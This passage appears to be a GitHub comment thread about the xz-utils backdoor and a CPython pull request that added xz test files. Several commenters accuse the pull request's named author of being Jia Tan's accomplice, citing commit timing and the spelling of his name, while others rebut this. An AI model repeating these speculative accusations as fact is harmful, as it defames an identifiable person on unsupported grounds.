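# Hypothetical sample payload: any byte string would do here.
sample = b"xz binding smoke test " * 64
print(roundtrip_ok(sample))
```

A check like this only exercises the binding itself. It says nothing about filter-specific behaviour, which is what test files for a new filter would be meant to cover.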

There was ZERO reason to bring all that shit into the cpython repo. If you are so worried about the RISCV variant you would, as a client of the downstream lib, just testbed that.

This is not a coinkidink.

@christoofar

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the RISC-V 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) described a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - a different scenario, but it reminds me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this; it could just be poor timing (everything can look suspicious in hindsight). The person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for a different architecture than the known backdoor. I just wondered if this risked adding a form of backdoor to Python at the time, even by accident.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creates more targets.

This is a significant find.

@redcode

redcode commented Apr 3, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the RISC-V 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) described a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - a different scenario, but it reminds me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this; it could just be poor timing (everything can look suspicious in hindsight). The person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for a different architecture than the known backdoor. I just wondered if this risked adding a form of backdoor to Python at the time, even by accident.

This guy claimed to be "an engineer from Bouffalo Lab", and his GitHub account was registered in 2015, 1 year before Bouffalo was founded (2016). Bouffalo Lab has products that use RISC-V cores, for example this one.

Looking at his commits, I see that sometimes he uses an email with domain bouffalolab.com, and other times, when he merges PRs, etc, another one with his personal domain. A priori he does not look like a spy/hacker.

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creates more targets.

This is a significant find.

Interesting... maybe he was being manipulated by Jia Tan?

His website consists of a blog with a single post about liblzma written this year (March 9th).

@AdrianBunk

cpython is just a binding project...

The PR would have caused CPython to move up the version it is binding to. This particular audience matters. A lot. It's the SoC tinkerboard community. They'll drive the mass adoption as Jia makes more enhancements and creates more targets.

It might be better for @christoofar to stop commenting here since he is only making a fool out of himself.

The tinkerboard community is a rather small part of the Linux community, without any real influence on anything.
And "cpython is just a binding project" is, well, the same as saying "I don't have the slightest clue what I am talking about".

@thesamesam
Author

thesamesam commented Apr 3, 2024

@AdrianBunk I have IRC logs but I don't want to post them publicly because it feels wrong, in part because it affects other members of the community.

I will share them with any official bodies who request them, and with Lasse, who has his own logs but wants to be able to verify them against mine. I'm also open to any other reasonable requests. I just don't want to dump them en masse either.

I appreciate this might be a bit controversial, but I don't want to throw out every norm we have in FOSS either.

@thesamesam
Author

@JohnVeness Thank you, fixing!

@lhmouse

lhmouse commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

@duanqn

duanqn commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

It is unusual but I don't think the name spelling itself is enough to call him/her 'suspicious'.

@christoofar

The name 'Chien Wong' is a bit suspicious, as this person claims to live in Nanjing, but neither word is Mandarin, and confuses native speakers. We do not know how to pronounce 'Chien'. It's like this person is from HK or TW. My advice is to write to Bouffalo Lab for confirmation.

I'm going to go with the theory that this is Jia Team Partner 2. I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

@thesamesam

@AdrianBunk

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

@wibeipummedo

"Person was perhaps just excited" is likely "Person is paid to improve RISC-V support".

As @redcode already mentioned, this is a person who has been active on GitHub for a decade, which looks quite different from the identities of the attacker.

The test files in this PR were just used in a small test case to check whether the output is as expected.

The exploit is that liblzma was used to add a backdoor to one specific program (sshd); none of that could have added a backdoor to Python by accident.

Python upstream seems happy with the general change and is not suspicious even now that the xz exploit is known.

Nothing about this person strikes me as being part of the attack; "poor timing" would be my first impression.
